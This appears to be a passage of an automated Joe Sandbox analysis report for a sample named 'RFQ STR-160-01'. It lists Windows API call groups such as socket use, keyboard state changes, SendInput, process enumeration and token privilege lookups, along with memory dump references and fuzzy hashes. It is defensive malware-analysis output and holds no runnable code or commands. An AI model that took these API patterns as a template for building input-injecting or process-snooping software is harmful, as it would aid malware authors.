              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F05F0
              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F0608
              • CLSIDFromProgID.OLE32(?,?,00000000,0062CC40,000000FF,?,00000000,00000800,00000000,?,0062FC08,?), ref: 005F062D
              • _memcmp.LIBVCRUNTIME ref: 005F064E
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FromProg$FreeTask_memcmp
              • String ID:
              • API String ID: 314563124-0
              • Opcode ID: f3f0b8e0dfa092ca74f8226147ce890ff0fde6cec801e48045add6e1fad44442
              • Instruction ID: eeab1a66e253fea1434b608d6cac6eefe7b842c4d4142567cd2b60b578a2769f
              • Opcode Fuzzy Hash: f3f0b8e0dfa092ca74f8226147ce890ff0fde6cec801e48045add6e1fad44442
              • Instruction Fuzzy Hash: 88810B71A00109EFCF04DF94C988DEEBBB9FF89315F144558E606AB291DB75AE06CB60
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: cd3d6b3917a9c03b94b0e067ad3cbb9719837307669350805f47d90e0fe5d6f8
              • Instruction ID: 899989fe0f506c52493a3a6755cd14b4dd56b8d2523fce2ebfb5ba630fbfd5d0
              • Opcode Fuzzy Hash: cd3d6b3917a9c03b94b0e067ad3cbb9719837307669350805f47d90e0fe5d6f8
              • Instruction Fuzzy Hash: 42413835600D02BBDF356BFC9C4AAAE7EA5FF81330F14062BF419D6392E67448415766
              APIs
              • GetWindowRect.USER32(0180EAC0,?), ref: 006262E2
              • ScreenToClient.USER32(?,?), ref: 00626315
              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00626382
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$ClientMoveRectScreen
              • String ID:
              • API String ID: 3880355969-0
              • Opcode ID: c55736043e421931dff06f57b58bc9fdcb2c2c45c1b09102239184a797eea780
              • Instruction ID: 5a54c34c659f77f8dd96c640c2547673ac6f6a2e8db8bcf4bf28ef99ce20bc6f
              • Opcode Fuzzy Hash: c55736043e421931dff06f57b58bc9fdcb2c2c45c1b09102239184a797eea780
              • Instruction Fuzzy Hash: 59510974A00619EFDF20DF68E881AEE7BB6EF45360F109259F9159B290D770AE41CF90
              APIs
              • socket.WSOCK32(00000002,00000002,00000011), ref: 00611AFD
              • WSAGetLastError.WSOCK32 ref: 00611B0B
              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00611B8A
              • WSAGetLastError.WSOCK32 ref: 00611B94
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$socket
              • String ID:
              • API String ID: 1881357543-0
              • Opcode ID: cd8d73d4cd827c07cb83d3bf0c40fab5ff9a00127fb3459f57eda8399f8db9a6
              • Instruction ID: 43ec8d8a7a904bad69af8e399448080a8e7a784e96e247a33ac1efea424df78d
              • Opcode Fuzzy Hash: cd8d73d4cd827c07cb83d3bf0c40fab5ff9a00127fb3459f57eda8399f8db9a6
              • Instruction Fuzzy Hash: 2A41A7356002016FEB209F24C88AF697BE5BB85718F54C458F6199F7D2D771ED42CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e01d4e625f439236090fbf87bce40b29d871fe4916fee3e254c9b65fd44120f
              • Instruction ID: c2feaf06b98bc45ea7b4898a811503e0e778be1b905646064fd2f1c5dfefac94
              • Opcode Fuzzy Hash: 4e01d4e625f439236090fbf87bce40b29d871fe4916fee3e254c9b65fd44120f
              • Instruction Fuzzy Hash: 0A41D675A04705BFE7289FB8CC86FAABFAAFB84710F10452EF141DB281D77199018790
              APIs
              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00605783
              • GetLastError.KERNEL32(?,00000000), ref: 006057A9
              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006057CE
              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006057FA
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateHardLink$DeleteErrorFileLast
              • String ID:
              • API String ID: 3321077145-0
              • Opcode ID: 1bf74683abbade38a01ff14f8b64f340003bdaefef442abbaab8506b3c81a0ed
              • Instruction ID: 42068c0fb7ab2c5af2c59197040e65e45e3bafbd69de4cb8e3780a3fbe6071a0
              • Opcode Fuzzy Hash: 1bf74683abbade38a01ff14f8b64f340003bdaefef442abbaab8506b3c81a0ed
              • Instruction Fuzzy Hash: 7B411A35604A15DFCF15DF15C548A5EBBE2BF89320B198489E84AAB3A2DB34FD01CF91
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,005B6D71,00000000,00000000,005B82D9,?,005B82D9,?,00000001,005B6D71,?,00000001,005B82D9,005B82D9), ref: 005CD910
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005CD999
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 005CD9AB
              • __freea.LIBCMT ref: 005CD9B4
                • Part of subcall function 005C3820: RtlAllocateHeap.NTDLL(00000000,?,00661444,?,005AFDF5,?,?,0059A976,00000010,00661440,005913FC,?,005913C6,?,00591129), ref: 005C3852
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 0dcb526d04021cabd8df79010fa09299ffd0271decc6ab92844d2aa9dfc902b9
              • Instruction ID: d218e9a872d5f0dd4e5d62c2f2da1f744f14f413fe8027bd63e33d891e20e8e7
              • Opcode Fuzzy Hash: 0dcb526d04021cabd8df79010fa09299ffd0271decc6ab92844d2aa9dfc902b9
              • Instruction Fuzzy Hash: AD319972A0020AAFDB249FA4DC85EAE7FB5EB81350B05426CFC04D6291EB35DD51CBA0
              APIs
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00625352
              • GetWindowLongW.USER32(?,000000F0), ref: 00625375
              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00625382
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006253A8
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LongWindow$InvalidateMessageRectSend
              • String ID:
              • API String ID: 3340791633-0
              • Opcode ID: d2431314450ec784b7c429989e21b89b6959a3fc7a6c4a3b28e4b6d6622ad29f
              • Instruction ID: f9b96e6c1486badf01866c287b443fae409befc9d8c7f32330622154c805b616
              • Opcode Fuzzy Hash: d2431314450ec784b7c429989e21b89b6959a3fc7a6c4a3b28e4b6d6622ad29f
              • Instruction Fuzzy Hash: EF31C434A55E28EFEF30DB14EC05BE83767AB053A0F586101FA12963E1E7B49D419F92
              APIs
              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 005FABF1
              • SetKeyboardState.USER32(00000080,?,00008000), ref: 005FAC0D
              • PostMessageW.USER32(00000000,00000101,00000000), ref: 005FAC74
              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 005FACC6
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: KeyboardState$InputMessagePostSend
              • String ID:
              • API String ID: 432972143-0
              • Opcode ID: 3a776301848f584cdb7b9c8d3276a0ea871746d1f58244fc4428a8a0a84bb648
              • Instruction ID: bc9ce6044fe0bff31881554f22733da9b3adc03090ad681a704626afd9574f5d
              • Opcode Fuzzy Hash: 3a776301848f584cdb7b9c8d3276a0ea871746d1f58244fc4428a8a0a84bb648
              • Instruction Fuzzy Hash: AB31E5B0A4061CAFFB358B6588187FE7EA6BB89320F04461AF689521D1C37D8D858753
              APIs
              • ClientToScreen.USER32(?,?), ref: 0062769A
              • GetWindowRect.USER32(?,?), ref: 00627710
              • PtInRect.USER32(?,?,00628B89), ref: 00627720
              • MessageBeep.USER32(00000000), ref: 0062778C
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Rect$BeepClientMessageScreenWindow
              • String ID:
              • API String ID: 1352109105-0
              • Opcode ID: b02d047536fc4a25eaa788ff019d987aa115a9b189e221f559ef21ce37e0f4d6
              • Instruction ID: f65eb05901d975e8b6582abb57ab5d6d471bb571a38182bd819faafbb0b2bbb4
              • Opcode Fuzzy Hash: b02d047536fc4a25eaa788ff019d987aa115a9b189e221f559ef21ce37e0f4d6
              • Instruction Fuzzy Hash: 68419834A09A25DFCB11CF58E894EA9B7F6BF49314F1881A8E8149B361C371E942CF90
              APIs
              • GetForegroundWindow.USER32 ref: 006216EB
                • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
              • GetCaretPos.USER32(?), ref: 006216FF
              • ClientToScreen.USER32(00000000,?), ref: 0062174C
              • GetForegroundWindow.USER32 ref: 00621752
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
              • String ID:
              • API String ID: 2759813231-0
              • Opcode ID: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
              • Instruction ID: 7e2cb1953ca957241d34d69a072532e8fb84301c6108f97576893c62a8282514
              • Opcode Fuzzy Hash: 99a19401e422e7fe2c4f5ab9c8429a3f33fa905f0fe269c4cb2404bab0506d59
              • Instruction Fuzzy Hash: 8F313E71D00549AFDB10EFAAC8858AEBBF9FF89304B50806AE415E7211E7319E45CFA0
              APIs
              • CreateToolhelp32Snapshot.KERNEL32 ref: 005FD501
              • Process32FirstW.KERNEL32(00000000,?), ref: 005FD50F
              • Process32NextW.KERNEL32(00000000,?), ref: 005FD52F
              • CloseHandle.KERNEL32(00000000), ref: 005FD5DC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
              • String ID:
              • API String ID: 420147892-0
              • Opcode ID: 61f757633cdc143a6074dda2e4c2a9a252212e1a56a0a8737d6ca057e34cf5da
              • Instruction ID: 2060fd762761da808b0b9fa9968a0f2e04911e09379320f4277318e00f259f34
              • Opcode Fuzzy Hash: 61f757633cdc143a6074dda2e4c2a9a252212e1a56a0a8737d6ca057e34cf5da
              • Instruction Fuzzy Hash: 63318B310083059FD701EF64C889ABEBFF9BFD9354F10092DF681821A1EB619949CBA2
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • GetCursorPos.USER32(?), ref: 00629001
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005E7711,?,?,?,?,?), ref: 00629016
              • GetCursorPos.USER32(?), ref: 0062905E
              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005E7711,?,?,?), ref: 00629094
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Cursor$LongMenuPopupProcTrackWindow
              • String ID:
              • API String ID: 2864067406-0
              • Opcode ID: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
              • Instruction ID: f7c6f9672cc6ed8f542fb3aa2f9c79e7ce1e35bb384e3e3aa4ecc01c5438983f
              • Opcode Fuzzy Hash: 3da15508689d73bc5fa5883cfe3a2bc9b5853500cc80126969e6d2aae38e6669
              • Instruction Fuzzy Hash: 4F21AD31600428AFCB298F94D858EEA3BBAFF8A360F044159F9059B2A1C3319951DF60
              APIs
              • GetFileAttributesW.KERNEL32(?,0062CB68), ref: 005FD2FB
              • GetLastError.KERNEL32 ref: 005FD30A
              • CreateDirectoryW.KERNEL32(?,00000000), ref: 005FD319
              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0062CB68), ref: 005FD376
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateDirectory$AttributesErrorFileLast
              • String ID:
              • API String ID: 2267087916-0
              • Opcode ID: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
              • Instruction ID: fd0261c4fe925718c8b8bd7f137be0b4b6b23671d9c11d32f1fc4c0dc2bc786f
              • Opcode Fuzzy Hash: a1ccc0d9253121d1186f86c6a307fe4ee1b3e5e01c4068b69d3059518fe5cade
              • Instruction Fuzzy Hash: 59219E705052069FC710DF28C8858AE7BE6BE95324F104E1DF699C32E1DB349A06CBA3
              APIs
                • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 005F102A
                • Part of subcall function 005F1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 005F1036
                • Part of subcall function 005F1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1045
                • Part of subcall function 005F1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 005F104C
                • Part of subcall function 005F1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 005F1062
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 005F15BE
              • _memcmp.LIBVCRUNTIME ref: 005F15E1
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F1617
              • HeapFree.KERNEL32(00000000), ref: 005F161E
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
              • String ID:
              • API String ID: 1592001646-0
              • Opcode ID: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
              • Instruction ID: 21f85cd3750485988359e7fa00fbf69e98105da4d65a7fba4b972cfb79a362ed
              • Opcode Fuzzy Hash: 4e0a791ff27b6ea1abfd237ac6dc795aa43459ebaa94aaa4f38e4cb009ea060b
              • Instruction Fuzzy Hash: DD215531E00909EBDF10DFA4C949BEEBBB9FF84354F084459E541AB241E739AA05DBA4
              APIs
              • GetWindowLongW.USER32(?,000000EC), ref: 0062280A
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622824
              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00622832
              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00622840
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Long$AttributesLayered
              • String ID:
              • API String ID: 2169480361-0
              • Opcode ID: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
              • Instruction ID: c6d2bda54c1485b58cd4d291efe939f2b4aa31e0d4d937461b9369dee7f0b96e
              • Opcode Fuzzy Hash: 8b6f0bd759a4f253f9ec7bcb6bfe6be73c2f7b1a39c5f5c6e25fb67c08c8459d
              • Instruction Fuzzy Hash: 3E21B631208922BFD7149B24DC55FAA7B96BF85324F148158F4168B6E2C775FC42CB90
              APIs
                • Part of subcall function 005F8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8D8C
                • Part of subcall function 005F8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 005F8DB2
                • Part of subcall function 005F8D7D: lstrcmpiW.KERNEL32(00000000,?,005F790A,?,000000FF,?,005F8754,00000000,?,0000001C,?,?), ref: 005F8DE3
              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7923
              • lstrcpyW.KERNEL32(00000000,?), ref: 005F7949
              • lstrcmpiW.KERNEL32(00000002,cdecl,?,005F8754,00000000,?,0000001C,?,?,00000000), ref: 005F7984
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: lstrcmpilstrcpylstrlen
              • String ID: cdecl
              • API String ID: 4031866154-3896280584
              • Opcode ID: cab7f656616971cd65039512c4c32e1a23bbae29b76fc80b3e8a7dfe700db0dd
              • Instruction ID: c40a878d5c59e3cf22b956a10e7b1eae3749e72dc3e9e5b09dbce51135807b57
              • Opcode Fuzzy Hash: cab7f656616971cd65039512c4c32e1a23bbae29b76fc80b3e8a7dfe700db0dd
              • Instruction Fuzzy Hash: 82112C3A20070AABDB255F34CC49D7E7BEAFF99350B40402AF942C7364EB759811C791
              APIs
              • GetWindowLongW.USER32(?,000000F0), ref: 00627D0B
              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00627D2A
              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00627D42
              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0060B7AD,00000000), ref: 00627D6B
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
